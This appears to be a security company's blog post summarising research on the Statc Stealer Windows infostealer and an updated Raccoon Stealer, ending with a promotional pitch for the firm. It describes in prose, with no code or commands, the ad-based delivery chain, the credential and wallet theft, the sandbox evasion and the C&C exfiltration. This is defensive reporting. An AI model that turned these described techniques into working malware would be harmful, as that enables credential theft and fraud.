A newly discovered malware strain named "Statc Stealer" has been making the rounds, wreaking havoc on devices operating on the Microsoft Windows platform by pilfering invaluable personal and financial data. The security experts, Shivam Sharma and Amandeep Kumar from Zscaler ThreatLabz, who published a comprehensive technical report this week, categorize the Stealer as a potent threat due to its expansive thieving proficiency.
Statc Stealer has the capabilities to swipe sensitive particulars from a broad spectrum of web browsers, involving not just login credentials, but also cookies, user preferences, and general web data. The threat extends to cryptocurrency wallets and messaging applications like Telegram, where Statc can steal credentials, passwords, and any other valuable data. Of particular concern is the fact that the stealer is written in C++, making it quite complex and challenging to counter.
The attacker usually tricks potential victims into clicking on seemingly harmless advertisements, with the stealer masquerading as an MP4 video file format on web browsers like Google Chrome. As the first-stage payload executes a decoy PDF installer, it surreptitiously installs a downloader binary, which in turn, retrieves the stealer malware from a remote server by leveraging a PowerShell script.
Due to its intelligent checks, the malware has a built-in capability to impede sandbox detection and reverse engineering attempts. It interacts with a command and control (C&C) server to offload the victim's harvested data securely via HTTPS. Additionally, it can scrutinize file names for any irregularities and can stop its execution to prevent detection if discrepancies are discovered.
The stealer majorly targets web browsers, including Google Chrome, Microsoft Edge, Mozilla Firefox, and extending to the Brave, Opera, and Yandex Browser. "The potency of the Statc Stealer lies within its ability to securely extract valuable browser data and transmit it to its C&C server," the researchers further explained. It provides the malware with a wealth of critical data such as passwords and personal information, paving the way for dangerous malpractices like identity theft and financial fraud.
These revelations emerged close to eSentire's recent publication, featuring an analysis of Raccoon Stealer's upgraded version, which saw its version 2.1 released in early February. Last year's arrest of lead developer Mark Sokolovsky led to a temporary halt in the malware's development. Sokolovsky mistakenly linked a Gmail account he used for cybercrime purposes under the alias Photix to an Apple iCloud account, consequently disclosing his real identity. The updated version of the stealer includes features like data collection from Signal Messenger, an evasion technique from Defender detection, and auto brute-forcing for crypto wallets.
With the increasing prevalence and complexity of such cyber threats, it has become increasingly important to stay updated with the latest cybersecurity news, insights, and preventive measures.
At Darksteel Technologies, we are an Orlando based business that can handle all aspects of your IT security. Providing compliance, training, malware protection, cloud security, devsecops, vulnerability management, penetration testing, architecture design and any other information security requirement your business needs. We focus on your cybersecurity so you don't have to.